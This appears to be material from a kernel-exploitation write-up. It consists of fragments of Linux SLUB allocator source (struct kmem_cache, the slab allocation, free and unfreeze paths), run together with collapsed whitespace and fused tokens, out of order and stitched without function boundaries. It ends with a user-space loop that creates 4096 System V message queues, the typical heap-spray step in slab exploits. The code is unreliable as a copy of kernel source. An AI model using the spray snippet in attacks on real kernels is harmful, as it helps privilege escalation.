structkmem_cache { #ifndef CONFIG_SLUB_TINY structkmem_cache_cpu __percpu *cpu_slab; #endif /* Used for retrieving partial slabs, etc. */ slab_flags_t flags; unsignedlong min_partial; unsignedint size; /* The size of an object including metadata */ unsignedint object_size;/* The size of an object without metadata */ structreciprocal_valuereciprocal_size; unsignedint offset; /* Free pointer offset */ #ifdef CONFIG_SLUB_CPU_PARTIAL /* Number of per cpu partial objects to keep around */ unsignedint cpu_partial; /* Number of per cpu partial slabs to keep around */ unsignedint cpu_partial_slabs; #endif structkmem_cache_order_objectsoo;
/* Allocation and freeing of slabs */ structkmem_cache_order_objectsmin; gfp_t allocflags; /* gfp flags to use on each alloc */ int refcount; /* Refcount for slab cache destroy */ void (*ctor)(void *); unsignedint inuse; /* Offset to metadata */ unsignedint align; /* Alignment */ unsignedint red_left_pad; /* Left redzone padding size */ constchar *name; /* Name (only for display!) */ structlist_headlist;/* List of slab caches */ #ifdef CONFIG_SYSFS structkobjectkobj;/* For sysfs */ #endif #ifdef CONFIG_SLAB_FREELIST_HARDENED unsignedlong random; #endif
#ifdef CONFIG_NUMA /* * Defragmentation by allocating from a remote node. */ unsignedint remote_node_defrag_ratio; #endif
out: /* * When init equals 'true', like for kzalloc() family, only * @orig_size bytes might be zeroed instead of s->object_size */ slab_post_alloc_hook(s, objcg, gfpflags, 1, &object, init, orig_size);
#ifdef CONFIG_PREEMPT_COUNT /* * We may have been preempted and rescheduled on a different * cpu before disabling preemption. Need to reload cpu area * pointer. */ c = slub_get_cpu_ptr(s->cpu_slab); #endif
slab = READ_ONCE(c->slab); if (!slab) { /* * if the node is not online or has no normal memory, just * ignore the node constraint */ if (unlikely(node != NUMA_NO_NODE && !node_isset(node, slab_nodes))) node = NUMA_NO_NODE; goto new_slab; } redo:
if (unlikely(!node_match(slab, node))) { /* * same as above but node_match() being false already * implies node != NUMA_NO_NODE */ if (!node_isset(node, slab_nodes)) { node = NUMA_NO_NODE; } else { stat(s, ALLOC_NODE_MISMATCH); goto deactivate_slab; } }
/* * By rights, we should be searching for a slab page that was * PFMEMALLOC but right now, we are losing the pfmemalloc * information when the page leaves the per-cpu allocator */ if (unlikely(!pfmemalloc_match(slab, gfpflags))) goto deactivate_slab;
/* must check again c->slab in case we got preempted and it changed */ local_lock_irqsave(&s->cpu_slab->lock, flags); if (unlikely(slab != c->slab)) { local_unlock_irqrestore(&s->cpu_slab->lock, flags); goto reread_slab; } freelist = c->freelist; if (freelist) goto load_freelist;
/* * freelist is pointing to the list of objects to be used. * slab is pointing to the slab from which the objects are obtained. * That slab must be frozen for per cpu allocations to work. */ VM_BUG_ON(!c->slab->frozen); c->freelist = get_freepointer(s, freelist); c->tid = next_tid(c->tid); local_unlock_irqrestore(&s->cpu_slab->lock, flags); return freelist;
if (slub_percpu_partial(c)) { local_lock_irqsave(&s->cpu_slab->lock, flags); if (unlikely(c->slab)) { local_unlock_irqrestore(&s->cpu_slab->lock, flags); goto reread_slab; } if (unlikely(!slub_percpu_partial(c))) { local_unlock_irqrestore(&s->cpu_slab->lock, flags); /* we were preempted and partial list got empty */ goto new_objects; }
slub_put_cpu_ptr(s->cpu_slab); slab = new_slab(s, gfpflags, node); c = slub_get_cpu_ptr(s->cpu_slab);
if (unlikely(!slab)) { slab_out_of_memory(s, gfpflags, node); returnNULL; }
stat(s, ALLOC_SLAB);
if (kmem_cache_debug(s)) { freelist = alloc_single_from_new_slab(s, slab, orig_size);
if (unlikely(!freelist)) goto new_objects;
if (s->flags & SLAB_STORE_USER) set_track(s, freelist, TRACK_ALLOC, addr);
return freelist; }
/* * No other reference to the slab yet so we can * muck around with it freely without cmpxchg */ freelist = slab->freelist; slab->freelist = NULL; slab->inuse = slab->objects; slab->frozen = 1;
inc_slabs_node(s, slab_nid(slab), slab->objects);
check_new_slab:
if (kmem_cache_debug(s)) { /* * For debug caches here we had to go through * alloc_single_from_partial() so just store the tracking info * and return the object */ if (s->flags & SLAB_STORE_USER) set_track(s, freelist, TRACK_ALLOC, addr);
return freelist; }
if (unlikely(!pfmemalloc_match(slab, gfpflags))) { /* * For !pfmemalloc_match() case we don't load freelist so that * we don't make further mismatched allocations easier. */ deactivate_slab(s, slab, get_freepointer(s, freelist)); return freelist; }
if (slab->freelist) { stat(s, DEACTIVATE_REMOTE_FREES); tail = DEACTIVATE_TO_TAIL; }
/* * Stage one: Count the objects on cpu's freelist as free_delta and * remember the last object in freelist_tail for later splicing. */ freelist_tail = NULL; freelist_iter = freelist; while (freelist_iter) { nextfree = get_freepointer(s, freelist_iter);
/* * If 'nextfree' is invalid, it is possible that the object at * 'freelist_iter' is already corrupted. So isolate all objects * starting at 'freelist_iter' by skipping them. */ if (freelist_corrupted(s, slab, &freelist_iter, nextfree)) break;
freelist_tail = freelist_iter; free_delta++;
freelist_iter = nextfree; }
/* * Stage two: Unfreeze the slab while splicing the per-cpu * freelist to the head of slab's freelist. * * Ensure that the slab is unfrozen while the list presence * reflects the actual number of objects during unfreeze. * * We first perform cmpxchg holding lock and insert to list * when it succeed. If there is mismatch then the slab is not * unfrozen and number of objects in the slab may have changed. * Then release lock and retry cmpxchg again. */ redo:
/* Determine target state of the slab */ new.counters = old.counters; if (freelist_tail) { new.inuse -= free_delta; set_freepointer(s, freelist_tail, old.freelist); new.freelist = freelist; } else new.freelist = old.freelist;
new.frozen = 0;
if (!new.inuse && n->nr_partial >= s->min_partial) { mode = M_FREE; } elseif (new.freelist) { mode = M_PARTIAL; /* * Taking the spinlock removes the possibility that * acquire_slab() will see a slab that is frozen */ spin_lock_irqsave(&n->list_lock, flags); } else { mode = M_FULL_NOLIST; }
if (!slab_update_freelist(s, slab, old.freelist, old.counters, new.freelist, new.counters, "unfreezing slab")) { if (mode == M_PARTIAL) spin_unlock_irqrestore(&n->list_lock, flags); goto redo; }
redo: /* * Determine the currently cpus per cpu slab. * The cpu may change afterward. However that does not matter since * data is retrieved via this pointer. If we are on the same cpu * during the cmpxchg then the free will succeed. */ c = raw_cpu_ptr(s->cpu_slab); tid = READ_ONCE(c->tid);
/* Same with comment on barrier() in slab_alloc_node() */ barrier();
if (USE_LOCKLESS_FAST_PATH()) { freelist = READ_ONCE(c->freelist);
set_freepointer(s, tail_obj, freelist);
if (unlikely(!__update_cpu_freelist_fast(s, freelist, head, tid))) { note_cmpxchg_failure("slab_free", s, tid); goto redo; } } else { /* Update the free list under the local lock */ local_lock(&s->cpu_slab->lock); c = this_cpu_ptr(s->cpu_slab); if (unlikely(slab != c->slab)) { local_unlock(&s->cpu_slab->lock); goto redo; } tid = c->tid; freelist = c->freelist;
do { if (unlikely(n)) { spin_unlock_irqrestore(&n->list_lock, flags); n = NULL; } prior = slab->freelist; counters = slab->counters; set_freepointer(s, tail, prior); new.counters = counters; was_frozen = new.frozen; new.inuse -= cnt; if ((!new.inuse || !prior) && !was_frozen) {
if (kmem_cache_has_cpu_partial(s) && !prior) {
/* * Slab was on no list before and will be * partially empty * We can defer the list move and instead * freeze it. */ new.frozen = 1;
} else { /* Needs to be taken off a list */
n = get_node(s, slab_nid(slab)); /* * Speculatively acquire the list_lock. * If the cmpxchg does not succeed then we may * drop the list_lock without any processing. * * Otherwise the list_lock will synchronize with * other processors updating the list of slabs. */ spin_lock_irqsave(&n->list_lock, flags);
} }
} while (!slab_update_freelist(s, slab, prior, counters, head, new.counters, "__slab_free"));
if (likely(!n)) {
if (likely(was_frozen)) { /* * The list lock was not taken therefore no list * activity can be necessary. */ stat(s, FREE_FROZEN); } elseif (new.frozen) { /* * If we just froze the slab then put it onto the * per cpu partial list. */ put_cpu_partial(s, slab, 1); stat(s, CPU_PARTIAL_FREE); }
return; }
if (unlikely(!new.inuse && n->nr_partial >= s->min_partial)) goto slab_empty;
/* * Objects left in the slab. If it was not on the partial list before * then add it. */ if (!kmem_cache_has_cpu_partial(s) && unlikely(!prior)) { remove_full(s, n, slab); add_partial(n, slab, DEACTIVATE_TO_TAIL); stat(s, FREE_ADD_PARTIAL); } spin_unlock_irqrestore(&n->list_lock, flags); return;
slab_empty: if (prior) { /* * Slab on the partial list. */ remove_partial(n, slab); stat(s, FREE_REMOVE_PARTIAL); } else { /* Slab must be on the full list */ remove_full(s, n, slab); }
for (int i = 0; i < 0x1000; i++) { if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0) { printf("[x] FAILD to get %d msg_queue!\n", i); perror("FAILED to get msg_queue"); exit(EXIT_FAILURE); } }